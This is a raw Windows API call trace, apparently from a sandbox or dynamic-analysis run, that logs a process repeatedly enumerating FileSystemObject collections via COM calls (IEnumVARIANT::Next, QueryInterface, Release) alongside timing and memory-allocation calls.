	[0046.996] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.997] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.997] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.998] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.999] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.999] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.000] free (_Block=0x3c8790) 
	[0047.000] free (_Block=0x3cd950) 
	[0047.000] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.000] ??3@YAXPEAX@Z () returned 0x1700020001
	[0047.000] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca340, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca340, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca340) returned 0x0
	[0047.005] FileSystemObject:IUnknown:Release (This=0x3ca340) returned 0x1
	[0047.006] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.007] GetCurrentThreadId () returned 0x9a8
	[0047.007] GetCurrentThreadId () returned 0x9a8
	[0047.007] ??2@YAPEAX_K@Z () returned 0x42ec00
	[0047.007] malloc (_Size=0x80) returned 0x3c84c0
	[0047.007] GetTickCount () returned 0x1145043
	[0047.012] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0047.012] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca370) returned 0x0
	[0047.012] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x1
	[0047.013] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.014] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x0
	[0047.015] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0047.015] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca370) returned 0x0
	[0047.015] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x1
	[0047.015] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.019] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.021] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eea8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.023] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.024] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eea8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.024] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x0
	[0047.024] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.025] FileSystemObject:IUnknown:Release (This=0x3ca340) returned 0x0
	[0047.025] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca340, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.025] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca340, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca340) returned 0x0
	[0047.025] FileSystemObject:IUnknown:Release (This=0x3ca340) returned 0x1
	[0047.025] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.026] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.027] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.028] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca340, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.028] FileSystemObject:IUnknown:Release (This=0x3ca340) returned 0x0
	[0047.028] free (_Block=0x3c84c0) 
	[0047.028] free (_Block=0x3cd950) 
	[0047.028] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.028] ??3@YAXPEAX@Z () returned 0x1c00050001
	[0047.029] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.030] GetTickCount () returned 0x1145052
	[0047.034] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.034] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.034] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.034] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.036] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.037] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.037] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.037] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.037] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.039] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.040] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.043] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.045] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.046] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.047] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.048] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.054] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eec8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.055] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ef48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.057] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.060] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.061] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.062] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.062] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.062] GetTickCount () returned 0x1145071
	[0047.062] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.067] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.067] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.067] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.067] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.069] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.070] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.070] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.070] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.070] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.072] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.073] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.074] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.075] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.076] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.077] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.079] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.080] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eec8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.082] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ef48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.083] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.083] GetTickCount () returned 0x1145091
	[0047.084] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.085] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.085] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.085] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.091] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.091] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.091] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.091] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.093] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.093] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.093] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0047.094] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.094] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.096] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.097] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.098] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.099] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.100] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.101] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.102] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.103] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eec8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.103] GetTickCount () returned 0x11450a0
	[0047.104] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.105] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.106] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.107] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.107] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.107] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.108] FileSystemObject:IUnknown:Release (This=0x42e730) returned 0x0
